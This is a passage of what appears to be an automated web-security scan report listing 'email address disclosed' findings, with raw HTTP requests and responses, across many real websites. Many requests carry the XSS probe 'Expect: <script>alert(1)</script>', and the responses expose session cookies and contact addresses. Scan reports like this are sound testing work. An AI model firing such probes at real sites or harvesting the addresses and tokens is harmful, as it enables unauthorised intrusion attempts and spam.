The following email address was disclosed in the response:

Request

GET /blog/wp-content/plugins/MV-sticky-footer/jquery.cookie.js?ver=3.1.1 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:58 GMT
Content-Type: application/x-javascript
Content-Length: 4246
Last-Modified: Thu, 14 Apr 2011 08:52:18 GMT
Connection: close
Accept-Ranges: bytes

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

25.57. http://www.quantumjumping.com/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /contact

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 12587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" >
<head>
               <script
...[SNIP]...
<a href="mailto:support@quantumjumping.com">
...[SNIP]...
<a href="mailto:info@mindvalley.com">info@mindvalley.com</a>
...[SNIP]...

25.58. http://www.quantumjumping.com/contact/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /contact/view

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact/view?tag=account&limit=5&title=Members+Area+and+Passwords HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.1.10.1304488444; __qca=P0-115106725-1304488446007

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 8020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<a href="mailto:support@quantumjumping.com">
...[SNIP]...
<a href="mailto:info@mindvalley.com">info@mindvalley.com</a>
...[SNIP]...

25.59. http://www.quantumjumping.com/customers/support/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /customers/support/article

Issue detail

The following email address was disclosed in the response:

Request

GET /customers/support/article?id=1343 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/contact/view?tag=account&limit=5&title=Members+Area+and+Passwords
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-115106725-1304488446007; __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.3.10.1304488444

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fcontact%2Fview%3Ftag%3Daccount%26limit%3D5%26title%3DMembers%2BArea%2Band%2BPasswords; expires=Wed, 04-May-2011 03:54:30 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 8515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<a href="mailto:info@mindvalley.com">info@mindvalley.com</a>
...[SNIP]...

25.60. http://www.quantumjumping.com/media/javascripts/contact.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/javascripts/contact.js

Issue detail

The following email address was disclosed in the response:

Request

GET /media/javascripts/contact.js HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:04 GMT
Content-Type: application/x-javascript
Content-Length: 1216
Last-Modified: Tue, 03 May 2011 05:50:40 GMT
Connection: close
Accept-Ranges: bytes

var RESET_SUBJECT = null;
var DEFAULT_SUBJECT = true;


$(function() {
   $('#faq-body').focus( function() {
       if( DEFAULT_SUBJECT ) {
           RESET_SUBJECT = $(this).val();
           $(this).val('');
           DEFAULT_SU
...[SNIP]...
ail address.');
       $('#faq-email').focus();
       return false;
   } else {
       if(window.validEmail) {
           if( !validEmail( $('#faq-email').val() ) ) {
               alert('Please provide a valid email address (example: your-name@some-domain.com).');
               $('#faq-email').focus();
               return false;
           }
       }
   }
   return true;
}

25.61. http://www.quantumjumping.com/media/themes/images/a/call.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The following email address was disclosed in the response:

Request

GET /media/themes/images/a/call.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:53:33 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<a href="mailto:info@mindvalley.com">info@mindvalley.com</a>
...[SNIP]...

25.62. http://www.quantumjumping.com/products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /products

Issue detail

The following email address was disclosed in the response:

Request

GET /products HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 111552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" >
<head>
       <script>
f
...[SNIP]...
<a href="mailto:info@mindvalley.com">info@mindvalley.com</a>
...[SNIP]...

25.63. http://www.rape-galleries.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rape-galleries.net
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rape-galleries.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.39
Date: Wed, 04 May 2011 04:19:03 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 352

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr>
<
...[SNIP]...
<a href="mailto:webmaster@advancedhosters.com">
...[SNIP]...

25.64. http://www.remtek.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.remtek.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.remtek.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:00:48 GMT
Server: REMTEK/1.0
Content-Type: text/html
Content-Length: 1908

<html>
<head>
   <title>REMTEK</title>
   <link type="text/css" rel="stylesheet" href="remtek/images/style.css">
</head>        

<body>

<img src="remtek/images/remtek.gif" alt="REMTEK">
<center><table width=
...[SNIP]...
<br>505-603-4073 - edremtek@wildblue.net</font>
...[SNIP]...

25.65. http://www.ringling.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ringling.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ringling.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.ringling.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=f51e086a-2451-4989-a6db-433ac743bb6e; expires=Fri, 04-May-2012 01:18:20 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Fri, 04-May-2012 01:18:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=trkmtpq5dr3yq423v5jauw1d; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:18:19 GMT
Content-Length: 1924


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Page not
...[SNIP]...
<a href="mailto:websitesupport@feldinc.com" >websitesupport@feldinc.com</a>
...[SNIP]...

25.66. http://www.rollanet.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rollanet.org
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rollanet.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:02:08 GMT
Server: Apache/2.2.8 (Fedora)
Content-Length: 513
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:helpdesk@rollanet.org">
...[SNIP]...

25.67. http://www.se-t.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.se-t.net
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.se-t.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 00:44:15 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
Keep-Alive: timeout=5
Set-Cookie: was=true; expires=Wed, 31-Dec-2014 21:00:00 GMT
Content-Length: 7560

<html>
<head>
<title>........ .. .......</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<meta name="keywords" content="....., ......... ...., ......, ....., .......
...[SNIP]...
<center>
admin@se-t.net
&nbsp;&nbsp;&nbsp;&nbsp;...... ...... marax. &nbsp;&nbsp;... ..... ......... 2007 - 2010
<br>
...[SNIP]...

25.68. http://www.seksamateur.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seksamateur.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.seksamateur.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.10
Date: Wed, 04 May 2011 01:11:39 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Language: en
Expires: Wed, 04 May 2011 01:11:39 GMT
Content-Length: 1010

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:root@xpower.net" />
...[SNIP]...
<a href="mailto:root@xpower.net">
...[SNIP]...

25.69. http://www.sepw.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sepw.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sepw.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:05:20 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=4htfdd45hxysu455j1tk3yem; path=/
Set-Cookie: Referer=; path=/
Set-Cookie: HttpReferer=; path=/
Set-Cookie: RightColumnNav1:CartList1=1; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28630


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Small Engine Parts Warehouse - Error Page</title>
       <meta content="Microsoft Visual Studio.NET 7.0" name="G
...[SNIP]...
<a href="mailto:parts@sepw.com%20">parts@sepw.com</a>
...[SNIP]...

25.70. http://www.sharonherald.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sharonherald.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sharonherald.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid
Date: Wed, 04 May 2011 01:57:06 GMT
Content-Type: text/html
Content-Length: 1396
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from cache3.peak.zope.net
Via: 1.0 cache3.peak.zope.net:8500 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...
<A HREF="mailto:sa@zope.com">sa@zope.com</A>
...[SNIP]...

25.71. http://www.shelteroffshore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shelteroffshore.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shelteroffshore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:50:39 GMT
Server: Apache/2.0.52 (Red Hat)
Content-Length: 530
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@shelteroffshore.com">
...[SNIP]...

25.72. http://www.stellarone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stellarone.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stellarone.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=10565873;expires=Fri, 26-Apr-2041 01:25:29 GMT;path=/
Set-Cookie: CFTOKEN=46a28e1113ba3a06-3618A20A-E41F-1378-0BDCAF893237AA9E;expires=Fri, 26-Apr-2041 01:25:29 GMT;path=/
Set-Cookie: BROWSEROPEN=yes;path=/
Date: Wed, 04 May 2011 01:25:29 GMT
Content-Length: 8972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/inte
...[SNIP]...
<a href="mailto:clientcontactcenter@stellarone.com" class="emailLink">
...[SNIP]...

25.73. http://www.surfers.ro/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surfers.ro
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.surfers.ro
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:28:41 GMT
Server: Apache
Content-Length: 495
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@surfers.ro">
...[SNIP]...

25.74. http://www.surnamesite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surnamesite.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.surnamesite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:33:29 GMT
Server: Apache/1.3.20 (Unix) PHP/4.0.6
Content-Type: text/html; charset=iso-8859-1
Content-Length: 485

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@surnamesite.com">
...[SNIP]...

25.75. http://www.theamericanmonk.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theamericanmonk.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.theamericanmonk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5cb03221148399a25dd09778513498e6; __utmz=63675568.1304488484.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63675568.836338964.1304488484.1304488484.1304488484.1; __utmc=63675568; __utmb=63675568.1.10.1304488484; sess_=ysv9sd684163c3y; lastvisit=1304488486; km_lv=1304488488; ref_=mr_7; vid=206617815

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 23523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
           
<script type="te
...[SNIP]...
if(window.validEmail) {
if( !validEmail( $('#iwfal-email').val() ) ) {
alert('Please provide a valid email address (example: your-name@some-domain.com).');
$('#iwfal-email').focus();
return false;
}
}
}


...[SNIP]...

25.76. http://www.theamericanmonk.com/media/javascripts/contact.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theamericanmonk.com
Path:   /media/javascripts/contact.js

Issue detail

The following email address was disclosed in the response:

Request

GET /media/javascripts/contact.js HTTP/1.1
Host: www.theamericanmonk.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/members/forgot-password
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5cb03221148399a25dd09778513498e6

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:44 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 04:13:30 GMT
ETag: "12142f-4c0-4a038371b6e80"-gzip
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Fri, 03 Jun 2011 00:54:44 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 1216

var RESET_SUBJECT = null;
var DEFAULT_SUBJECT = true;


$(function() {
   $('#faq-body').focus( function() {
       if( DEFAULT_SUBJECT ) {
           RESET_SUBJECT = $(this).val();
           $(this).val('');
